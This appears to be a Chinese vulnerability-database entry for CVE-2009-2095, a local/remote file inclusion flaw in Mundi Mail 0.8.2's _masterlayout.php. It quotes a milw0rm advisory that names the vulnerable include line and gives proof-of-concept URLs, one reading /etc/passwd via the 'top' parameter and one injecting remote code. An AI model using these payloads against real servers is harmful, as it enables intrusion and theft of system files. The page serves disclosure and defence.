Mundi King Mail '_masterlayout.php'文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117975 漏洞类型 代码注入
发布时间 2009-06-15 更新时间 2009-06-15
CVE编号 CVE-2009-2095 CNNVD-ID CNNVD-200906-283
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8948
https://www.securityfocus.com/bid/44138
https://cxsecurity.com/issue/WLB-2009060147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-283
|漏洞详情
MundiMail0.8.2版本的template/simpledefault/admin/_masterlayout.php中存在PHP远处文件包含漏洞,当register_globals被激活时,远程攻击者可以借助top参数中的一个URL,执行任意PHP代码。
|漏洞EXP
----------------------------------------------------------------------------------------------------------


  Name : Mundi Mail
  Site : http://sourceforge.net/projects/mundimail/

  Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732


----------------------------------------------------------------------------------------------------------


 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com


----------------------------------------------------------------------------------------------------------


  Description:

  Bug : Local/Remote File Inclusion

 template/simpledefault/admin/_masterlayout.php:10:	include($top);




  If allow_url_fopen=on   --> RFI;
  If magic_quotes_gpc=off --> LFI;  



----------------------------------------------------------------------------------------------------------


  P0c:
 
    LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd

    RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]


  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-15]
|受影响的产品
Mundi King Mundi Mail 0.8.2
|参考资料

来源:MILW0RM
名称:8948
链接:http://www.milw0rm.com/exploits/8948